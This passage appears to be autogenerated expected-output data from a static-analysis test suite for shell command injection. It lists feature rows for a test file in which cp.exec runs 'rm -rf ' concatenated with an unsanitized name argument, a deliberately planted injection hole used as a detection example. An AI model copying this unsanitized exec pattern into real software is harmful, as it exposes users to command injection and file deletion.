last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:14:137:17 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:14:137:17 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:14:137:17 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:14:137:17 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:14:137:17 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:14:137:17 | name | enclosingFunctionName | constructor | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:14:137:17 | name | enclosingFunctionName | constructor | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:14:137:17 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:14:137:17 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:3:138:4 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:3:138:4 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:3:138:4 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:3:138:4 | cp | enclosingFunctionName | constructor | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:3:138:4 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:3:138:9 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:3:138:9 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:3:138:9 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:3:138:9 | cp.exec | enclosingFunctionName | constructor | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:3:138:9 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:3:138:27 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:3:138:27 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:3:138:27 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:3:138:27 | cp.exec ... + name) | enclosingFunctionName | constructor | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:3:138:27 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:3:138:27 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:3:138:27 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:3:138:27 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:3:138:27 | exceptional return of cp.exec ... + name) | enclosingFunctionName | constructor | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:3:138:27 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:6:138:9 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:6:138:9 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:6:138:9 | exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:6:138:9 | exec | enclosingFunctionName | constructor | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:6:138:9 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:11:138:19 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:11:138:19 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:11:138:19 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:11:138:19 | "rm -rf " | enclosingFunctionName | constructor | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:11:138:19 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:11:138:19 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:11:138:26 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:11:138:26 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:11:138:26 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:11:138:26 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:11:138:26 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:11:138:26 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:11:138:26 | "rm -rf " + name | enclosingFunctionName | constructor | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:11:138:26 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:11:138:26 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:23:138:26 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:23:138:26 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:23:138:26 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:23:138:26 | name | enclosingFunctionName | constructor | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:23:138:26 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:23:138:26 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:141:1:141:6 | module | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:141:1:141:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:141:1:141:6 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:141:1:141:14 | module.exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:141:1:141:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:141:1:141:14 | module.exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:141:1:141:19 | module.exports.cla4 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:141:1:141:19 | module.exports.cla4 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:141:1:141:19 | module.exports.cla4 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:141:1:141:32 | module. ... Cla4() | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:141:1:141:32 | module. ... Cla4() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:141:1:141:32 | module. ... Cla4() | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:141:8:141:14 | exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:141:8:141:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:141:8:141:14 | exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:141:16:141:19 | cla4 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:141:16:141:19 | cla4 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:141:16:141:19 | cla4 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:141:23:141:32 | exceptional return of new Cla4() | contextFunctionInterfaces | 